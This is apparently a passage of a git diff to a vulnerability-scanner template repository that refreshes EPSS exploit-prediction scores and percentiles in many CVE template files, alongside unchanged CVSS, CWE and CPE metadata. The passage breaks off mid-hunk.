a/code/cves/2025/CVE-2025-68926.yaml +++ b/code/cves/2025/CVE-2025-68926.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-68926 - epss-score: 0.04122 - epss-percentile: 0.88298 + epss-score: 0.06663 + epss-percentile: 0.90947 cwe-id: CWE-798 metadata: verified: true diff --git a/dast/cves/2020/CVE-2020-9402.yaml b/dast/cves/2020/CVE-2020-9402.yaml index 4634c5f68c2..6e2a072e23b 100644 --- a/dast/cves/2020/CVE-2020-9402.yaml +++ b/dast/cves/2020/CVE-2020-9402.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-9402 cwe-id: CWE-89 - epss-score: 0.81181 - epss-percentile: 0.99124 + epss-score: 0.83719 + epss-percentile: 0.99265 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: vendor: djangoproject diff --git a/dast/cves/2021/CVE-2021-35042.yaml b/dast/cves/2021/CVE-2021-35042.yaml index 2eb341fc37e..987d70b25d3 100644 --- a/dast/cves/2021/CVE-2021-35042.yaml +++ b/dast/cves/2021/CVE-2021-35042.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35042 cwe-id: CWE-89 - epss-score: 0.35237 - epss-percentile: 0.9691 + epss-score: 0.86184 + epss-percentile: 0.99377 metadata: verified: true fofa-query: body="ProgrammingError" && body="ORDER BY" diff --git a/dast/cves/2022/CVE-2022-22965.yaml b/dast/cves/2022/CVE-2022-22965.yaml index 6dd0dd581da..fa1cbd61dcd 100644 --- a/dast/cves/2022/CVE-2022-22965.yaml +++ b/dast/cves/2022/CVE-2022-22965.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 - epss-score: 0.94441 - epss-percentile: 0.99989 + epss-score: 0.94428 + epss-percentile: 0.99981 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 34d8cf5b326..cd2e7267834 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42889 cwe-id: CWE-94 - epss-score: 0.94161 - epss-percentile: 0.9991 + epss-score: 0.94251 + epss-percentile: 0.99926 metadata: max-request: 1 confidence: tenative diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index 68ea8ab3f0f..da9f1766e90 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-25031 cwe-id: CWE-20 epss-score: 0.83676 - epss-percentile: 0.99263 + epss-percentile: 0.99262 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/headless/cves/2022/CVE-2022-29455-headless.yaml b/headless/cves/2022/CVE-2022-29455-headless.yaml index 486dba718b0..6784ce0431a 100644 --- a/headless/cves/2022/CVE-2022-29455-headless.yaml +++ b/headless/cves/2022/CVE-2022-29455-headless.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29455 cwe-id: CWE-79 epss-score: 0.52986 - epss-percentile: 0.97866 + epss-percentile: 0.97862 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/headless/cves/2024/CVE-2024-29882.yaml b/headless/cves/2024/CVE-2024-29882.yaml index 479ee37a4d1..23de06da028 100644 --- a/headless/cves/2024/CVE-2024-29882.yaml +++ b/headless/cves/2024/CVE-2024-29882.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2024-29882 cwe-id: CWE-79 - epss-score: 0.07333 - epss-percentile: 0.91434 + epss-score: 0.07702 + epss-percentile: 0.91652 metadata: verified: true max-request: 1 diff --git a/headless/cves/2024/CVE-2024-38526.yaml b/headless/cves/2024/CVE-2024-38526.yaml index fbd4efef7c7..2484fc9df0c 100644 --- a/headless/cves/2024/CVE-2024-38526.yaml +++ b/headless/cves/2024/CVE-2024-38526.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.2 cve-id: CVE-2024-38526 epss-score: 0.82064 - epss-percentile: 0.99171 + epss-percentile: 0.99173 tags: cve,cve2024,supply-chain,polyfill,vkev,vuln headless: - steps: diff --git a/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml b/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml index 1bf52f659e0..acbd1532739 100644 --- a/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml +++ b/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-29927 cwe-id: CWE-285 epss-score: 0.92896 - epss-percentile: 0.9976 + epss-percentile: 0.99759 metadata: vendor: vercel product: Next.js diff --git a/headless/cves/2025/CVE-2025-8191.yaml b/headless/cves/2025/CVE-2025-8191.yaml index f1308d90374..a9debd5afb5 100644 --- a/headless/cves/2025/CVE-2025-8191.yaml +++ b/headless/cves/2025/CVE-2025-8191.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2025-8191 cwe-id: CWE-79 - epss-score: 0.01065 - epss-percentile: 0.77231 + epss-score: 0.01078 + epss-percentile: 0.77357 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index f32e7cb4dbe..13a12bdaeff 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.3 cve-id: CVE-2000-0114 epss-score: 0.05458 - epss-percentile: 0.89909 + epss-percentile: 0.89905 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2000/CVE-2000-0760.yaml b/http/cves/2000/CVE-2000-0760.yaml index 4ba31c35213..1a767053234 100644 --- a/http/cves/2000/CVE-2000-0760.yaml +++ b/http/cves/2000/CVE-2000-0760.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.4 cve-id: CVE-2000-0760 epss-score: 0.38569 - epss-percentile: 0.97118 + epss-percentile: 0.97117 cpe: cpe:2.3:a:apache:tomcat:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index e1935cc2b9e..4f1bde32d97 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2002-1131 cwe-id: CWE-80 - epss-score: 0.03877 - epss-percentile: 0.87902 + epss-score: 0.03351 + epss-percentile: 0.86974 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index e1312f1f144..98ae56a0bea 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.00124 - epss-percentile: 0.32352 + epss-percentile: 0.32296 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index fe988897fe9..be815732018 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.00265 - epss-percentile: 0.4973 + epss-percentile: 0.49702 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 693d0f2dc63..c768f7beab2 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.08605 - epss-percentile: 0.92165 + epss-percentile: 0.92159 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3128.yaml b/http/cves/2005/CVE-2005-3128.yaml index cd46a79eab3..0172fb64181 100644 --- a/http/cves/2005/CVE-2005-3128.yaml +++ b/http/cves/2005/CVE-2005-3128.yaml @@ -17,7 +17,7 @@ info: cvss-score: 5.4 cve-id: CVE-2005-3128 epss-score: 0.01733 - epss-percentile: 0.82015 + epss-percentile: 0.82014 cwe-id: CWE-80 metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 121519e8180..3a48031416d 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.1015 - epss-percentile: 0.92886 + epss-percentile: 0.9288 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 50ae689b49c..80d3049c4a9 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.01653 - epss-percentile: 0.81603 + epss-percentile: 0.81595 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 326e44b3419..3164e79dd00 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other - epss-score: 0.00373 - epss-percentile: 0.58475 + epss-score: 0.00434 + epss-percentile: 0.62307 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 6a78bd0aec7..cf8feecd8d3 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.00299 - epss-percentile: 0.52821 + epss-percentile: 0.52809 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 8292d68730e..c0c6daa3fac 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2006-2842 cwe-id: CWE-22 epss-score: 0.0094 - epss-percentile: 0.75754 + epss-percentile: 0.75747 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-3392.yaml b/http/cves/2006/CVE-2006-3392.yaml index 3ec18d6bfa8..1829a89734b 100644 --- a/http/cves/2006/CVE-2006-3392.yaml +++ b/http/cves/2006/CVE-2006-3392.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5.0 cve-id: CVE-2006-3392 - epss-score: 0.79497 - epss-percentile: 0.99041 + epss-score: 0.78348 + epss-percentile: 0.98981 cwe-id: CWE-22 metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index fc446964350..3712f4835cf 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.8 cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other - epss-score: 0.03471 - epss-percentile: 0.87206 + epss-score: 0.01569 + epss-percentile: 0.81096 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-2449.yaml b/http/cves/2007/CVE-2007-2449.yaml index 34af2713de6..b54561dcdb2 100644 --- a/http/cves/2007/CVE-2007-2449.yaml +++ b/http/cves/2007/CVE-2007-2449.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - epss-score: 0.7477 - epss-percentile: 0.98816 + epss-score: 0.47305 + epss-percentile: 0.97589 metadata: max-request: 1 verified: true diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 9bfeab807aa..7908ce93a71 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2007-3010 cwe-id: CWE-20 epss-score: 0.94007 - epss-percentile: 0.99887 + epss-percentile: 0.99885 cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 0bc1224d1b1..f0d84bae5a1 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.00177 - epss-percentile: 0.39554 + epss-percentile: 0.39506 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 7311b12dbd1..c6970d60a5b 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other epss-score: 0.02359 - epss-percentile: 0.84513 + epss-percentile: 0.84511 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 1c0e68790bd..c314c7af951 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.00523 - epss-percentile: 0.66326 + epss-percentile: 0.66311 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index af08930dc14..2b0ad6a4caa 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.00265 - epss-percentile: 0.49758 + epss-percentile: 0.49735 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index ca8ee147df5..09fc2d04ae1 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.3714 + epss-percentile: 0.37083 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index e1589b6e20b..c74223a752a 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00437 - epss-percentile: 0.62553 + epss-percentile: 0.62552 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 38868c4f3af..b6ffb598d7e 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.01643 - epss-percentile: 0.81539 + epss-percentile: 0.81531 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 97c392d61ae..b25c1cd63d3 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.00144 - epss-percentile: 0.35192 + epss-percentile: 0.35133 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 224db8ec35c..a042aff4d3a 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-4764 cwe-id: CWE-22 epss-score: 0.01041 - epss-percentile: 0.76988 + epss-percentile: 0.76979 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 581fe82aa88..f32575c126e 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.01986 - epss-percentile: 0.83174 + epss-percentile: 0.83173 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index ae1edf9f8df..e6f5a7ef575 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.05386 - epss-percentile: 0.89833 + epss-percentile: 0.89829 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 87d5ec85ed7..90f369a426b 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6222 cwe-id: CWE-22 epss-score: 0.03072 - epss-percentile: 0.86356 + epss-percentile: 0.86358 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index c0bc6bdbc43..a1774fddf25 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.01157 - epss-percentile: 0.78125 + epss-percentile: 0.7812 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index a40314fac54..825d1df84ed 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00573 - epss-percentile: 0.68078 + epss-percentile: 0.68065 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 153b8037114..ff805a164eb 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.08587 - epss-percentile: 0.92154 + epss-percentile: 0.92148 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 075df7b5dbd..d52efbd2429 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-7269 cwe-id: CWE-20 epss-score: 0.04298 - epss-percentile: 0.88529 + epss-percentile: 0.88528 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 715fb239b92..0164cf5570f 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.94006 - epss-percentile: 0.99885 + epss-percentile: 0.99884 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 1f3fec42081..52f04bd9742 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.01909 - epss-percentile: 0.82837 + epss-percentile: 0.82834 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 483e56910ee..4c1b2067ab0 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-1558 cwe-id: CWE-22 epss-score: 0.09101 - epss-percentile: 0.92413 + epss-percentile: 0.92409 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 81078b845e7..1702e9f350a 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-1872 cwe-id: CWE-79 epss-score: 0.08673 - epss-percentile: 0.92199 + epss-percentile: 0.92193 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 7a31a1006ff..9ee97df574e 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.02124 - epss-percentile: 0.8371 + epss-percentile: 0.83703 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 844489de572..8999334830e 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-2100 cwe-id: CWE-22 epss-score: 0.01858 - epss-percentile: 0.82597 + epss-percentile: 0.82593 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index d6f6a7fad87..7e358356929 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.01557 - epss-percentile: 0.81045 + epss-percentile: 0.81035 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 42fe90c9a22..1f02358a4b5 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.01442 - epss-percentile: 0.80326 + epss-percentile: 0.80319 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 9d967513a98..f2be6afbfc1 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.04613 - epss-percentile: 0.88933 + epss-percentile: 0.88931 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 3329501bc6f..ac3b4935196 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.04261 - epss-percentile: 0.88482 + epss-percentile: 0.88481 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index d20bcec5b69..2b0f074c632 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.23302 - epss-percentile: 0.95771 + epss-percentile: 0.95775 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 097fd339e31..c326831be65 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.01473 - epss-percentile: 0.80538 + epss-percentile: 0.80527 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index f999022ca5b..95ae8329609 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-5114 cwe-id: CWE-22 epss-score: 0.08663 - epss-percentile: 0.92193 + epss-percentile: 0.92187 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 1d855742549..ecf3d6b0473 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.16031 - epss-percentile: 0.94568 + epss-percentile: 0.94565 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index e23d240fe51..1c155a6576f 100644 --- 